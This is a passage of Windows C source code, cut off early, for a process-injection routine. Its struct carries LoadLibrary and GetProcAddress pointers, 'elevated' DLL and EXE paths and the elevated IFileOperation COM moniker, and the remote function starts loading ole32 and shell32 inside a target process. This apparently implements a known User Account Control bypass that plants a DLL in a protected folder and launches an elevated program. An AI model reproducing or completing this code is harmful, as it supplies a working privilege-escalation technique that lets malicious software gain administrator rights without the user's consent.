#define _HAS_EXCEPTIONS 0
#include <windows.h>
#include <commctrl.h>
#include <shlobj.h>
#include <psapi.h>
struct InjectArgs
{
// Functions
BOOL (WINAPI *FFreeLibrary)(HMODULE hLibModule);
HMODULE (WINAPI *FLoadLibrary)(LPCWSTR lpLibFileName);
FARPROC (WINAPI *FGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
BOOL (WINAPI *FCloseHandle)(HANDLE);
DWORD (WINAPI *FWaitForSingleObject)(HANDLE,DWORD);
// Static strings
wchar_t szSourceDll[MAX_PATH];
wchar_t szElevDir[MAX_PATH];
wchar_t szElevDll[MAX_PATH];
wchar_t szElevDllFull[MAX_PATH];
wchar_t szElevExeFull[MAX_PATH];
wchar_t szElevArgs[MAX_PATH];
wchar_t szEIFOMoniker[MAX_PATH]; // szElevatedIFileOperationMoniker
// some GUIDs
IID pIID_EIFO;
IID pIID_ShellItem2;
IID pIID_Unknown;
// Dll and import strings
wchar_t NameShell32[20];
wchar_t NameOle32[20];
char NameCoInitialize[20];
char NameCoUninitialize[20];
char NameCoGetObject[20];
char NameCoCreateInstance[20];
char NameSHCreateItemFromParsingName[30];
char NameShellExecuteExW[20];
// IMPORTANT: Allocating structures here (so we know where it was allocated)
SHELLEXECUTEINFO shinfo;
BIND_OPTS3 bo;
};
// important: error code here is passed back to original process (1 = success, 0 = failure)
static DWORD WINAPI RemoteCodeFunc(InjectArgs * Args)
{
NTSTATUS Status = 0;
HMODULE ModuleOle32 = Args->FLoadLibrary(Args->NameOle32);
HMODULE ModuleShell32 = Args->FLoadLibrary(Args->NameShell32);
if (!ModuleOle32 || !ModuleShell32)
return 0;